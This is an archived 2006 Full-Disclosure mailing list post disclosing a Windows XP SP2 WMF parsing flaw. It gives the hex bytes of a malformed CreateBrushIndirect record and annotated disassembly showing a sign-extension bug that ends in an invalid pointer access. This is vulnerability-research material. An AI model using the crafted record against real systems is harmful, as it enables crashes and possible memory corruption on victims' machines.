[<prev] [next>] [day] [month] [year] [list]
Message-ID: <118889282.20060807033429@gmail.com>
Date: Mon, 7 Aug 2006 03:34:29 +0400
From: cyanid-E <biz4rre@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: 0-day XP SP2 wmf exploit (some details)
There is some details for wannabees :)
1. 'Bad' wmf record:
07 00 00 00
length of record (in words)
FC 02
type (CreateBrushIndirect)
08 00 00 00 00 00 00 80
'packed' (good old Win16 days) LOGBRUSH data:
08 00 - 'packed' lpStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
00 00 00 00 - COLORREF (any)
00 80 - 'packed' lbHatch (any, signed)
2. Sign extension bug:
_CommonEnumMetaFile:
......
; normalize 'packed' LOGBRUSH
movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16))
mov [ebp-0f8], eax
mov eax, [ebx + 8] ; COLORREF (as is)
mov [ebp-0f4], eax
movsx eax, word ptr [ebx+0c] ; <-- BUGBUG: lbHatch (UINT32(INT16))
lea eax, [ebp-0f8]
push eax
call _CreateBrushIndirect
......
3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:
cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle
jz _go2crush
......
cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle
jz _go2crush
......
_go2crush:
push esi
push 1
push eax, [ebp+10]
push eax
push dword ptr [ebp+0c] ; 1
push dword ptr [ebp+18] ; lpHatch (fake *packedDIB)
call _pbmiConvertInfo
......
......
_pbmiConvertInfo:
......
push ebx
mov ebx, [ebp+8] ; lpHatch (fake *packedDIB)
......
mov eax, [ebx] ; <-- BUGBUG: crush or random (in first 0x7f00 bytes)
; memory access (see @ 0x3000 region)
good luck,
cyanid-E
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists